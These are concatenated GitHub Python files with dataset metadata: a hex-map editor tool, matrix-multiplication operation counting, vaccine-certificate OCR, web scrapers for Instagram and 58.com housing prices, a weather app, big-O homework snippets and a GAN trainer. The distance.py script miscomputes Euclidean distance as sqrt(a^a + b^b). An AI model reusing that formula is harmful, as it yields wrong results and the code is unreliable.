MultiHex2.core.enums import ToolLayer\nfrom MultiHex2.actions.baseactions import NullAction\nfrom MultiHex2.generation.name_gen import create_name\nfrom MultiHex2.actions.regionactions import Merge_Regions_Action, Region_Add_Remove, New_Region_Action\n\nimport os \n\nfrom PyQt5 import QtGui, QtWidgets\n\nfrom MultiHex2.core.coordinates import hex_to_screen\n\nart_dir = os.path.join( os.path.dirname(__file__),'..','assets','buttons')\n\n\nclass RegionAdd(Basic_Tool):\n \"\"\"\n Used to add/remove from a region. \n Left click add, right click remove. If it's in state zero, tries to select the region under the cursor. \n \"\"\"\n def __init__(self, parent):\n Basic_Tool.__init__(self, parent)\n self.highlight = True\n self._selected_rid = -1\n\n self.regionType = Region\n self._need_to_update_widget = False\n\n def get_selected_region(self):\n if self._selected_rid!=-1:\n return self.parent.accessRegion(self._selected_rid, self.tool_layer())\n else:\n return None\n\n @property\n def selected(self):\n return self._selected_rid\n\n @classmethod\n def tool_layer(cls):\n return ToolLayer.terrain\n\n def deselect(self):\n self._selected_rid = -1\n self._need_to_update_widget = True\n return super().deselect()\n\n def update_gui(self):\n # update widget \n if self._selected_rid != -1:\n this_region = self.get_selected_region()\n self.widget_instance.ui.name_edit.setText(this_region.name)\n color = this_region.fill\n self.widget_instance.new_color = color\n self.widget_instance.ui.color_choice_button.setStyleSheet(\"background-color:rgb({},{},{})\".format(color.red(), color.green(), color.blue()))\n else:\n self.widget_instance.ui.name_edit.setText(\"\")\n self.widget_instance.ui.color_choice_button.setStyleSheet(\"\")\n\n self._need_to_update_widget = False\n\n def select(self, rid:int):\n \"\"\"\n Select a region\n \"\"\"\n self._selected_rid = rid\n self._need_to_update_widget = True\n\n def mouse_moved(self, event):\n if self._need_to_update_widget:\n self.update_gui()\n return NullAction()\n\n def secondary_mouse_held(self, event):\n return self.secondary_mouse_released(event)\n\n def primary_mouse_held(self, event):\n return self.primary_mouse_released(event)\n \n def secondary_mouse_released(self, event):\n \"\"\"\n Removes hex from region\n \"\"\"\n loc = screen_to_hex( event.scenePos() )\n this_rid = self.parent.accessHexRegion(loc, self.tool_layer()) \n\n if this_rid is None:\n return NullAction()\n else:\n self.select(this_rid)\n return Region_Add_Remove(rID = None, hexID=loc, layer=self.tool_layer())\n \n\n def primary_mouse_released(self, event: QtWidgets.QGraphicsSceneMouseEvent):\n loc = screen_to_hex( event.scenePos() )\n this_rid = self.parent.accessHexRegion(loc, self.tool_layer()) # region under hex, none if no region\n if self._selected_rid == -1:\n # make new region\n if this_rid is None:\n hex_here = Hex(hex_to_screen(loc))\n\n actual_hex = self.parent.accessHex(loc)\n new_region = self.regionType(hex_here)\n new_region.set_geography(actual_hex.geography)\n if self.tool_layer()==ToolLayer.civilization:\n new_region.set_name(create_name(\"county\", filename=self.widget_instance.text_source))\n else:\n new_region.set_name(create_name(new_region.geography, filename=self.widget_instance.text_source))\n action = New_Region_Action(region=new_region, rid=self.parent.get_next_rid(self.tool_layer()), layer=self.tool_layer())\n self.select(action.rID)\n #self._selected_rid = action.rID\n return action\n else:\n # choose the region under the cursor \n self.select(this_rid)\n #self._selected_rid = this_rid\n return NullAction()\n\n else:\n # add to the selected region or add \n if this_rid is None:\n # add to that region\n # [\"rID\", 'hexID']\n return Region_Add_Remove(rID = self._selected_rid, hexID=loc, layer=self.tool_layer())\n else:\n self.select(this_rid)\n #self._selected_rid = this_rid\n return NullAction()\n\n @classmethod\n def widget(self):\n return RegionWidget\n\n @classmethod\n def buttonIcon(cls):\n assert(os.path.exists(os.path.join(art_dir, \"biome_brush.svg\")))\n return QtGui.QPixmap(os.path.join(art_dir, \"biome_brush.svg\")).scaled(48,48)\n\n @classmethod\n def altText(cls):\n return \"Biome Draw Tool\"\n\n\nclass CivAdd(RegionAdd):\n def __init__(self, parent):\n super().__init__(parent)\n self.regionType = County\n\n @classmethod\n def tool_layer(cls):\n return ToolLayer.civilization\n\n @classmethod\n def buttonIcon(cls):\n assert(os.path.exists(os.path.join(art_dir, \"county.svg\")))\n return QtGui.QPixmap(os.path.join(art_dir, \"county.svg\")).scaled(48,48)\n\n @classmethod\n def altText(cls):\n return \"County Draw Tool\"","repo_name":"BenSmithers/MultiHex2","sub_path":"MultiHex2/tools/regiontools.py","file_name":"regiontools.py","file_ext":"py","file_size_in_byte":5613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16014631140","text":"import numpy as np\nimport random\n\nsize_array = []\n\nfor i in range(1, 21):\n size_array.append(i*i)\n\ntime = 0\noutputList_a = []\noutputList_b = []\noutputList_c = []\nstr_sequential = []\nstr_parallel_a = []\nstr_parallel_b = []\nstr_parallel_c = []\nwhile time < 20:\n N = size_array[time]\n\n X = np.zeros([N, N], dtype=int)\n\n Y = np.copy(X)\n\n result = np.copy(X)\n\n for a in range(N):\n for b in range(N):\n X[a][b] = random.randint(0, 10*N)\n Y[a][b] = random.randint(0, 10*N)\n\n sequential_count = 0\n parallel_count = 0\n\n # iterate through rows of X\n for i in range(N):\n # iterate through columns of Y\n for j in range(N):\n # iterate through rows of Y\n parallel_count = parallel_count+1\n for k in range(N):\n sequential_count = sequential_count+1\n result[i][j] += X[i][k] * Y[k][j]\n str_sequential.append(sequential_count)\n str_parallel_a.append(parallel_count)\n the_string_to_write_on_file = str(\n N)+\" \"+str(sequential_count)+\" \"+str(parallel_count)\n outputList_a.append(the_string_to_write_on_file)\n parallel_count = 0\n result = np.zeros([N, N], dtype=int)\n for i in range(N):\n # iterate through columns of Y\n for j in range(N):\n # iterate through rows of Y\n parallel_count = parallel_count+1\n for k in range(N):\n result[i][(j + k) % N] += X[i][k] * Y[k][(j + k) % N]\n str_parallel_b.append(parallel_count)\n the_string_to_write_on_file = str(\n N)+\" \"+str(sequential_count)+\" \"+str(parallel_count)\n outputList_b.append(the_string_to_write_on_file)\n\n\n parallel_count = 0\n result = np.zeros([N, N], dtype=int)\n\n for a in range(N):\n operation_no = 1+(N-1)*a\n parallel_count = parallel_count+operation_no\n X[a] = np.roll(X[a], -a)\n\n for b in range(N):\n operation_no = 1+(N-1)*b\n parallel_count = parallel_count+operation_no\n Y[:, b] = np.roll(Y[:, b], -b, axis=0)\n\n for k in range(N):\n for i in range(N):\n for j in range(N):\n\n result[i][j] += X[i][j] * Y[i][j]\n\n for a in range(N):\n parallel_count = parallel_count+(N-1)+1\n X[a] = np.roll(X[a], -1)\n for b in range(N):\n parallel_count = parallel_count+(N-1)+1\n Y[:, b] = np.roll(Y[:, b], -1, axis=0)\n\n str_parallel_c.append(parallel_count)\n the_string_to_write_on_file = str(\n N)+\" \"+str(sequential_count)+\" \"+str(parallel_count)\n print\n outputList_c.append(the_string_to_write_on_file)\n\n time = time + 1\n\nWritingOnOutFile_a = open(\"Question1_a.txt\", \"w\")\nWritingOnOutFile_a.write('\\n'.join(outputList_a))\nWritingOnOutFile_a.close()\n\nWritingOnOutFile_b = open(\"Question1_b.txt\", \"w\")\nWritingOnOutFile_b.write('\\n'.join(outputList_b))\nWritingOnOutFile_b.close()\n\nWritingOnOutFile_c = open(\"Question1_c.txt\", \"w\")\nWritingOnOutFile_c.write('\\n'.join(outputList_c))\nWritingOnOutFile_c.close()\n\nprint(\"Algorithm Type, Input Size = 1,Input Size = 2,Input Size = 3,Input Size = 4,Input Size = 5,Input Size = 6,Input Size = 7,Input Size = 8,Input Size = 9,Input Size = 10,Input Size = 11\")\nprint(\"Sequential Algorithm,\", end=\"\")\n\n\n\nfor k,item in enumerate(str_sequential):\n if k != len(str_sequential)-1:\n print(item, end=\",\")\n else:\n print(item)\n\nprint(\"CRCW Algorithm,\", end=\"\")\n\nfor k,item in enumerate(str_parallel_a):\n if k != len(str_parallel_a)-1:\n print(item, end=\",\")\n else:\n print(item)\n\nprint(\"EREW Algorithm,\", end=\"\")\n\nfor k,item in enumerate(str_parallel_b):\n if k != len(str_parallel_b)-1:\n print(item, end=\",\")\n else:\n print(item)\n\nprint(\"2-D Meshes Algorithm,\", end=\"\")\n\nfor k,item in enumerate(str_parallel_c):\n if k != len(str_parallel_c)-1:\n print(item, end=\",\")\n else:\n print(item)\n","repo_name":"sarismet/MPI-Algorithm-Analysis","sub_path":"ismetsariQ1.py","file_name":"ismetsariQ1.py","file_ext":"py","file_size_in_byte":3921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20907076748","text":"import cv2\nimport pytesseract\nimport numpy as np\nfrom pyzbar.pyzbar import decode\nfrom pdf2img import convertPdf\nfrom pprint import pprint\nfrom itertools import islice\n\n\npytesseract.pytesseract.tesseract_cmd = r'D:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe'\n\n\ndef nth_index(iterable, value, n):\n matches = (idx for idx, val in enumerate(iterable) if val == value)\n return next(islice(matches, n-1, n), None)\n\n\ndef getDataFromFile(file):\n imgName = convertPdf(file)\n image = 'upload/images/'+imgName+\".jpg\"\n # print(\"image path is : \", image)\n img = cv2.imread(image)\n img2Decode = img\n # img = cv2.resize(img, (0, 0), fx=0.4, fy=0.4)\n\n heightImg, widthImg, _ = img.shape\n # Extracting text position from image\n boxes = pytesseract.image_to_data(img)\n words = []\n for x, b in enumerate(boxes.splitlines()):\n # print(b)\n\n if x != 0:\n b = b.split()\n # print(b)\n # Text only exists if length == 12\n if(len(b) == 12):\n words.append(b[11])\n # x, y, width, height = int(b[6]), int(\n # b[7]), int(b[8]), int(b[9])\n # # Using the returned coordinates to draw rectangles around the text\n # cv2.rectangle(img, (x, y), (width+x, height+y), (0, 0, 255), 3)\n # cv2.putText(img, b[11], (x, y),\n # cv2.FONT_HERSHEY_COMPLEX, 1, (50, 50, 255), 2)\n\n # Extracting Data from QR code in image\n code = decode(img2Decode)\n\n # Converting extracted data to readable text\n qrContent = str(code[0].data.decode('UTF-8'))\n\n values = qrContent.split(',')\n\n values[0] = values[0][1:]\n values[-1] = values[-1][:-1]\n\n dict = {}\n\n # Creating dictionary from QR Code data\n for value in values:\n value = value.replace('\"', '')\n # print(value)\n dict[value[:value.index(':')]] = value[value.index(':')+1:]\n # print(values)\n\n # print(dict)\n # Evax number = 16\n dateDose2 = []\n if(words[words.index('vaccin:')+1] != 'JENSSEN'):\n dateDose2 = words[words.index('2:')+1:words.index('N°')]\n wordsDict = {\n \"numEvax\": words[words.index(\"EVAX:\")+1],\n 'nomEtPrenom': words[words.index('Prénom:')+1:words.index('Carte')],\n 'idNumber': words[words.index(\"nationale:\")+1],\n 'dateOfBirth': words[words.index(\"naissance:\")+1:nth_index(words, \"Informations\", 2)],\n 'refVaccin': words[words.index(':')+1],\n 'nomDeVaccin': words[words.index('vaccin:')+1],\n 'dateDose1': words[words.index('1:')+1:nth_index(words, 'Date', 3)],\n 'dateDose2': dateDose2,\n }\n\n # pprint(wordsDict)\n # cv2.imwrite(\"Result.jpeg\", img)\n # print(words)\n return({\"dict\": dict, \"words\": wordsDict})\n\n # dict = eval(code[0].data.decode('UTF-8'))\n # print(dict)\n # cv2.imshow('Result', img)\n # cv2.waitKey(0)\n","repo_name":"TarekBenYahia/VaccineDataExtract","sub_path":"extractData.py","file_name":"extractData.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"17804761582","text":"'''\nauthor - Pramod\ndate - 20-1-2021\npackage -functional programs\nTitle - Euclidean distance from 1 point to origin\n'''\n\nfrom sys import argv\nfrom math import sqrt,pow\nprint('enter two integers (x,y):',argv)\nargs=argv[1:]\na,b=int(args[0]),int(args[1])\ntry:\n distance = sqrt(pow(a,a)+pow(b,b))\n print('Euclidean distance is:',distance)\nexcept ValueError:\n print('provide integer input')\n","repo_name":"pramod-cpu/python","sub_path":"functional programs/distance.py","file_name":"distance.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12792987647","text":"# from ushuffle import shuffle, Shuffler\nfrom Bio import SeqIO\nfrom Bio.SeqRecord import SeqRecord\nfrom Bio.Seq import Seq\nfrom statistics import median, quantiles\n\n# filename = './animals_asu_database.fasta'\nfilename = './iniciallimpo.fasta'\n# filename = './negativos1limpo.fasta'\n\nsequences = [i for i in SeqIO.parse(filename,'fasta')]\n\nprint(len(sequences))\n\nsequence_a = sequences[0]\nseqSize = []\n\n\n\n\nfor seq in sequences:\n seqSize.append(len(str(seq.seq)))\n\ntotal = 0\nminSize = 0\nmaxSize = 0\n\nfor size in seqSize:\n total = total + size\n\n if(size < minSize or minSize == 0):\n minSize = size\n\n if(size > maxSize or maxSize == 0):\n maxSize = size\n\naverage = total / len(seqSize)\nmedianValue = median(seqSize)\n\nprint(seqSize)\nprint(f\"Total: {total}\")\nprint(f\"Média: {average}\")\nprint(f\"Tamanho mínimo: {minSize}\")\nprint(f\"Tamanho máximo: {maxSize}\")\nprint(f\"Mediana: {medianValue}\")\nprint(quantiles(seqSize, n=4))\n","repo_name":"nalualvarez/telomerase","sub_path":"codes/tamanho.py","file_name":"tamanho.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3227207725","text":" # noqa\n\nfrom copy import deepcopy\n\nfrom flowbber.components import Source\n\n\nclass ConfigSource(Source):\n\n def declare_config(self, config):\n config.add_option(\n 'data',\n schema={\n 'type': 'dict',\n 'empty': False,\n },\n )\n\n def collect(self):\n return deepcopy(self.config.data.value)\n\n\n__all__ = ['ConfigSource']\n","repo_name":"kuralabs/flowbber","sub_path":"lib/flowbber/plugins/sources/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"28404284352","text":"import requests\nimport re\nimport json\n\n\nclass FetchInstagramUser():\n\n def __init__(self):\n self.base_url = 'https://www.instagram.com/'\n self.pattern = '\", html, re.S)[0]\n res = re.sub(\"\\s\", \"\", res)\n dic = json.loads(res)\n for k, v in dic.items():\n for k1, v1 in v.items():\n dic[k][k1] = v1.split(\"|\")[0]\n city_dict = {}\n\n def traverse_dict(dic: dict):\n for k, v in dic.items():\n if k == \"海外\" or k == \"其他\":\n continue\n if isinstance(v, dict):\n traverse_dict(v)\n city_dict[k] = v\n\n traverse_dict(dic)\n\n other_city = re.findall(\"independentCityList = (.*?)var\", html, re.S)[0]\n res = re.sub(\"\\s\", \"\", other_city)\n other_city_dic = json.loads(res)\n\n for k, v in other_city_dic.items():\n other_city_dic[k] = v.split(\"|\")[0]\n\n city_dict.update(other_city_dic)\n self.all_city_dict = city_dict\n\n\n def info_zufang(self, city:str = \"武汉\"):\n '''爬取租房信息的爬虫方法'''\n assert self.all_city_dict is not None, \"获取所有城市信息失败\"\n print(\"---all_city_dict---\")\n format_city = self.all_city_dict.pop(city, None)\n print(\"format_city:\", format_city)\n assert format_city is not None, \"{}该城市不在爬取城市之内\".format(city)\n\n '''构造该城市租房页面url,获取所需数据'''\n self.city = city \n start_url = \"https://{}.58.com/chuzu/j2/\".format(format_city)\n\n # 收集每一页中的价格信息\n self.__spiders(start_url)\n\n\n def info_xinfang(self, city:str = \"武汉\"):\n '''爬取买房信息的爬虫方法'''\n assert self.all_city_dict is not None, \"获取所有城市信息失败\"\n print(\"---all_city_dict---\")\n format_city = self.all_city_dict.pop(city, None)\n print(\"format_city:\", format_city)\n assert format_city is not None, \"{}该城市不在爬取城市之内\".format(city)\n \n '''构造该城市买房页面url,获取所需数据'''\n self.city = city \n start_url = \"https://{}.58.com/xinfang/loupan/all/\".format(format_city)\n\n # 收集每一页中的价格信息\n self.__spiders2(start_url)\n \n\n\n\n def __get_html_source(self, url, params=None):\n '''通过get方式获取到网页的源码'''\n time.sleep(2)\n headers = self.session.headers.copy()\n try:\n if not params:\n params = {}\n response = self.session.get(url=url, headers=headers, params=params)\n return response\n except Exception as e:\n with open(\"./url_log_error.txt\", \"a\", encoding=\"utf-8\") as f:\n f.write(str(datetime.datetime.now()) + \"\\n\")\n f.write(str(e) + \"\\n\")\n f.write(\"error_url>>:{}\".format(url) + \"\\n\")\n\n\n def __get_price(self, response):\n\n html = response.text\n\n # 开始从页面中提取出想要的数据\n xml = etree.HTML(html)\n xpath_list = xml.xpath(\"//div[@class='money']/b[@class='strongbox']\")\n for price_info_list in xpath_list:\n house_price = re.sub(\"\\s\", \"\", price_info_list.xpath(\n \"string(.)\"))\n house_price = int(house_price)\n # print(house_price)\n if house_price > self.highest:\n self.highest = house_price \n if house_price and house_price < self.lowest:\n self.lowest = house_price\n\n\n def __get_xinfang_info(self, url, params):\n response = self.__get_html_source(url, params)\n html = response.text\n\n # 开始从页面中提取出想要的数据\n xml = etree.HTML(html)\n # \n xpath_list = xml.xpath(\"//p[@class='price']/span|//p[@class='favor-tag around-price']/span\")[0]\n \n house_price = re.sub(\"\\s\", \"\", xpath_list.xpath(\"string(.)\"))\n # house_price = int(house_price)\n unit = re.sub(\"<.*>\", \"\", etree.tostring(xpath_list, encoding='UTF-8').decode()).strip()\n xpath_list = xml.xpath(\"//span[@class='building-area']\")[0]\n area = re.sub(\"\\s\", \"\", xpath_list.xpath(\"string(.)\")).split(':')[1]\n return house_price, unit, area\n \n \n\n\n\n def __response_to_xml(self, response):\n try:\n xml = etree.HTML(response.text)\n # print(response.text)\n return xml\n except AttributeError:\n raise CustomException(10000, \"response对象转换为xml失败,错误的链接地址为>>:{}\".format(response))\n\n\n def __is_exist_next_page(self, response):\n '''判断是否存在下一页,存在拿到下一页的链接,不存在返回False'''\n xml = self.__response_to_xml(response)\n try:\n next_page_url = xml.xpath(\"//a[@class='next']/@href\")[0]\n # print(next_page_url)\n return next_page_url\n except IndexError:\n return False\n\n def __spiders(self, url):\n '''租房信息爬取'''\n page_num = 1\n params = None \n while True:\n print(\"正在爬取{}--第{}页数据...\".format(self.city, page_num))\n time.sleep(2)\n # url = format_url.format(page_num)\n response = self.__get_html_source(url, params)\n self.__get_price(response) \n\n # 判断是否还有下一页\n url = self.__is_exist_next_page(response)\n print(url)\n if not url:\n print(\"{}爬取完毕\".format(self.city))\n return\n page_num += 1\n\n def __spiders2(self, url):\n '''买房信息爬取'''\n params = None\n time.sleep(1)\n\n url_h = url + \"h2_s1/\"\n url_l = url + \"h2_s2/\"\n \n self.highest, self.unit_h, self.area_h = self.__get_xinfang_info(url_h, params)\n self.lowest, self.unit_l, self.area_l = self.__get_xinfang_info(url_l, params)\n\n \n \n \n# //*[@id=\"tab-customer\"]\nif __name__ == '__main__':\n city20 = [\"重庆\",\"上海\",\"北京\",\"成都\",\"天津\",\"广州\",\"深圳\",\"武汉\",\n \"南阳\",\"临沂\",\"石家庄\",\"哈尔滨\",\"苏州\",\"保定\",\"郑州\",\"西安\",\n \"赣州\",\"邯郸\",\"温州\",\"潍坊\"]\n # city20 = [\"重庆\"]\n city_58 = Info_58()\n zufang_list = []\n xinfang_list = []\n for city in city20:\n # city_58.highest = 0\n # city_58.lowest = float('inf')\n # city_58.info_zufang(city)\n # zufang_list.append([city, city_58.highest, city_58.lowest])\n city_58.info_xinfang(city)\n xinfang_list.append([city,city_58.highest+'('+city_58.unit_h+')',city_58.area_h,\n city_58.lowest+'('+city_58.unit_l+')', city_58.area_l])\n\n columns_z = [\"城市\", \"最高价\", \"最低价\"]\n columns_x = [\"城市\", \"最高价(单位)\", \"面积(最高)\",\"最低价(单位)\",\"面积(最低)\"]\n dt = pd.DataFrame(xinfang_list, columns=columns_x)\n dt.to_csv(\"buy_csv.csv\", mode='a', index=0)\n","repo_name":"goen-kkk/webcrawler","sub_path":"58Info.py","file_name":"58Info.py","file_ext":"py","file_size_in_byte":8064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20119721775","text":"from flask import Flask, render_template, request, flash\nimport requests\n\ndef resultado(lat, lon):\n api_key = \"\" # Inserir uma chave da API válida. \n OWM_Endpoint = \"https://api.openweathermap.org/data/2.5/onecall\"\n\n weather_params = {\n \"lat\": lat,\n \"lon\": lon,\n \"appid\": api_key,\n \"exclude\": \"hourly,minutely,daily\"\n }\n\n response = requests.get(OWM_Endpoint, params=weather_params)\n\n response.raise_for_status()\n data_json = response.json()\n clima_atual = data_json[\"current\"][\"weather\"][0][\"id\"]\n\n if int(clima_atual) >= 200 and int(clima_atual) <= 232:\n retorno = \"Melhor pegar um guarda chuva! Tempestade!\"\n elif int(clima_atual) >= 500 and int(clima_atual) <= 531:\n retorno = \"Melhor pegar um guarda chuva! Está Chovendo!\"\n elif int(clima_atual) >= 600 and int(clima_atual) <= 622:\n retorno = \"É natal? Pois está nevando!!!\"\n elif int(clima_atual) > 781 and int(clima_atual)<= 800:\n retorno = \"Está tudo limpo! Ótimo para sair de casa!\"\n elif int(clima_atual) >= 801:\n retorno = \"Está nublado!\"\n return retorno\n\napp = Flask(__name__)\napp.secret_key = \"samhow\"\n\n@app.route(\"/home\")\ndef home():\n flash(\"Seu resultado irá aparecer aqui!\")\n return render_template(\"index.html\")\n\n@app.route(\"/result\", methods=[\"POST\", \"GET\"])\ndef result():\n flash(resultado(lat=float(str(request.form[\"input1\"])), lon=float(str(request.form[\"input2\"]))))\n return render_template(\"index.html\")\n\nif __name__ == '__main__':\n app.run(debug=True,port=5001)","repo_name":"Gabriel-Maires/WeatherBrasil","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8694291097","text":"\"\"\" -------------------------------------------------------------------------------------------------------------------\r\nITEC 136: Homework 09 - 02\r\n\r\nProvide different code snippets for\r\neach of the following complexities.\r\n\r\nO(n2)\r\nO(n)\r\nO(1)\r\nO( nlog(n) )\r\nO( log(n) )\r\n\r\n@author: Dani Hooven\r\n@version: 11/06/2020\r\n\r\n-------------------------------------------------------------------------------------------------------------------- \"\"\"\r\n\r\n\r\n# O(n^2)\r\ntest = 0\r\nfor i in range(n):\r\n for j in range(n):\r\n test = test + i * j\r\n\r\n\r\n# O(n)\r\ntest = 0\r\nfor i in range(n):\r\n test = test + 1\r\n\r\nfor j in range(n):\r\n test = test - 1\r\n\r\n\r\n# O(log n)\r\ni = n\r\nwhile i > 0:\r\n k = 2 + 2\r\n i = i // 2\r\n\r\n\r\n# O(1) - index assignment\r\nmydict['x'] = mydict['x'] + 1\r\n\r\n\r\n# O(nlog(n))\r\ndef anagramSolution2(s1,s2):\r\n alist1 = list(s1)\r\n alist2 = list(s2)\r\n\r\n alist1.sort()\r\n alist2.sort()\r\n\r\n pos = 0\r\n matches = True\r\n\r\n while pos < len(s1) and matches:\r\n if alist1[pos]==alist2[pos]:\r\n pos = pos + 1\r\n else:\r\n matches = False\r\n\r\n return matches\r\n\r\nprint(anagramSolution2('abcde','edcba'))","repo_name":"danihooven/Principles-of-Programming","sub_path":"Homework09/homework09_02.py","file_name":"homework09_02.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5426500619","text":"import os\nimport shutil\nimport numpy as np\nimport pandas as pd\nimport argparse \nimport torch\n\nimport torchvision.transforms.functional as Functional\n# import torch.nn._reduction as _Reduction\nfrom torch.utils.data import DataLoader\nimport torchvision.transforms as transforms\n\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.utils as vutils\n\nfrom model.model import *\nfrom utils.dataload import build_annoations, CustomImageDataset\n\ndef remove_z_depth(path):\n # remove all Z_depth images\n root_path = path\n\n for root, dirs, files in os.walk(root_path):\n for file in files:\n if 'Z_depth' in file:\n os.remove(os.path.join(root, file))\n\ndef copy_folder_content(src_path, dest_path):\n # construct the src path and file name\n files = os.listdir(src_path)\n\n os.makedirs(dest_path, exist_ok=True)\n\n for f in files:\n output_fname = f\n if os.path.exists(os.path.join(dest_path, output_fname)):\n i = len(files)\n while os.path.exists(os.path.join(dest_path, output_fname)):\n output_fname = f.split('.')[0][:-4] #take image name\n output_fname = output_fname + '-' + str(i).zfill(4) + '.png'\n i += 1\n shutil.copyfile(os.path.join(src_path, f), os.path.join(dest_path, output_fname))\n \ndef copy_imgs(root_path, output_path):\n for root, dirs, _ in os.walk(root_path):\n for dir in dirs:\n if dir in [str(i) for i in range(10)]:\n print('copying', os.path.join(root,dir))\n copy_folder_content(os.path.join(root,dir), output_path)\n\ndef show(imgs):\n if not isinstance(imgs, list):\n imgs = [imgs]\n fig, axs = plt.subplots(ncols=len(imgs), squeeze=False)\n for i, img in enumerate(imgs):\n img = img.detach()\n img = Functional.to_pil_image(img)\n axs[0, i].imshow(np.asarray(img))\n axs[0, i].set(xticklabels=[], yticklabels=[], xticks=[], yticks=[])\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)\n\nclass CustomLoss(nn.Module):\n def __init__(self):\n super(CustomLoss, self).__init__()\n\n def forward(self, label, output, mask):\n error = nn.functional.binary_cross_entropy(label, output, weight=mask, reduction='none')\n error = torch.sum(error, dim=(1,2))\n non_zero = torch.count_nonzero(mask, (1,2))\n\n error = torch.mean(torch.div(error,non_zero))\n\n return error\n \nif __name__ == '__main__':\n print('Start')\n\n parser = argparse.ArgumentParser()\n #TODO add others illuminants\n parser.add_argument('--data_dir', type=str, default='/scratch/gfurnari/transparent/D65', help='path to the dataset')\n parser.add_argument('--label_dir', type=str, default='/scratch/gfurnari/transparent/SHADE', help='path to the labels')\n parser.add_argument('--batch', type=int, default=32, help='batch size')\n parser.add_argument('--output_dir', type=str, default='/scratch/gfurnari/albedo-output/exp-1/', help='output directory pathname')\n parser.add_argument('--epochs', type=int, default=10, help='number of epochs')\n parser.add_argument('--lr', type=float, default=1e-3, help='initial learning rate')\n parser.add_argument('--betal', type=float, default=0.5, help='beta1 value')\n parser.add_argument('--workers', help='Number of workers for dataloader', default=1)\n parser.add_argument('--ngpu', type=int, default=1, help='number of gpus')\n\n opt = parser.parse_args()\n\n ## ARGUMENTS ##\n # Root directory for dataset\n dataroot = \"/content/imgs\"\n # Number of workers for dataloader\n workers = opt.workers\n # Batch size during training\n batch_size = opt.batch\n # Number of training epochs\n num_epochs = opt.epochs\n # Learning rate for optimizers\n lr = opt.lr\n # Beta1 hyperparam for Adam optimizers\n beta1 = opt.betal\n # Number of GPUs available. Use 0 for CPU mode.\n ngpu = opt.ngpu\n\n data_path = opt.data_dir #'/scratch/gfurnari/transparent/D65'\n label_path = opt.label_dir #'/scratch/gfurnari/transparent/SHADE'\n output_dir = opt.output_dir #'/scratch/gfurnari/transparent-output'\n\n # Set random seed for reproducibility\n manualSeed = 999\n #manualSeed = random.randint(1, 10000) # use if you want new results\n print(\"Random Seed: \", manualSeed)\n random.seed(manualSeed)\n torch.manual_seed(manualSeed)\n\n #run just once\n # remove_z_depth('/scratch/gfurnari/transparent/')\n\n annotations = build_annoations(data_path)\n print(len(annotations))\n annotations.head()\n\n os.makedirs(output_dir, exist_ok=True)\n annotations.to_csv(os.path.join(output_dir,'annotations.csv'),index=False)\n\n image_size = 256 \n\n transform = transforms.Compose([\n transforms.Resize(image_size),\n # transforms.ToTensor(),\n # transforms.ConvertDtype(torch.float),\n transforms.ConvertImageDtype(torch.float),\n # normalize_images\n # transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)), \n ])\n \n training_data = CustomImageDataset(os.path.join(output_dir,'annotations.csv'), transform, transform)\n train_dataloader = DataLoader(training_data, batch_size=batch_size, shuffle=True)\n\n train_features, labels, masks = next(iter(train_dataloader))\n\n device = torch.device(\"cuda:0\" if (torch.cuda.is_available() and ngpu > 0) else \"cpu\")\n print(device)\n\n # Create the generator\n netG = Generator(ngpu).to(device)\n\n # Handle multi-gpu if desired\n if (device.type == 'cuda') and (ngpu > 1):\n netG = nn.DataParallel(netG, list(range(ngpu)))\n\n # Apply the weights_init function to randomly initialize all weights\n # to mean=0, stdev=0.02.\n netG.apply(weights_init)\n\n # Print the model\n print(netG)\n\n # Create the Discriminator\n netD = SiameseDiscriminatorPixelWise(ngpu).to(device)\n\n # Handle multi-gpu if desired\n if (device.type == 'cuda') and (ngpu > 1):\n netD = nn.DataParallel(netD, list(range(ngpu)))\n\n # Apply the weights_init function to randomly initialize all weights\n # to mean=0, stdev=0.2.\n netD.apply(weights_init)\n\n # Print the model\n print(netD) \n \n # Initialize BCELoss function\n criterion = CustomLoss()\n # criterion = BCELoss()\n\n # Create batch of latent vectors that we will use to visualize\n # the progression of the generator\n\n real_batch = next(iter(train_dataloader))\n fixed_noise = real_batch[0].to(device) # fixed images\n\n # Establish convention for real and fake labels during training\n real_label = 1.\n fake_label = 0.\n\n # Setup Adam optimizers for both G and D\n optimizerD = optim.Adam(netD.parameters(), lr=lr, betas=(beta1, 0.999))\n optimizerG = optim.Adam(netG.parameters(), lr=lr, betas=(beta1, 0.999))\n\n # Training Loop\n\n # Lists to keep track of progress\n img_list = []\n G_losses = []\n D_losses = []\n iters = 0\n\n print(\"Starting Training Loop...\")\n # For each epoch\n for epoch in range(num_epochs):\n # For each batch in the dataloader\n for i, data in enumerate(train_dataloader, 0):\n ############################\n # (1) Update D network: maximize log(D(x)) + log(1 - D(G(z)))\n ###########################\n ## Train with all-real batch\n netD.zero_grad()\n # Format batch\n real_cpu = data[1].to(device)\n 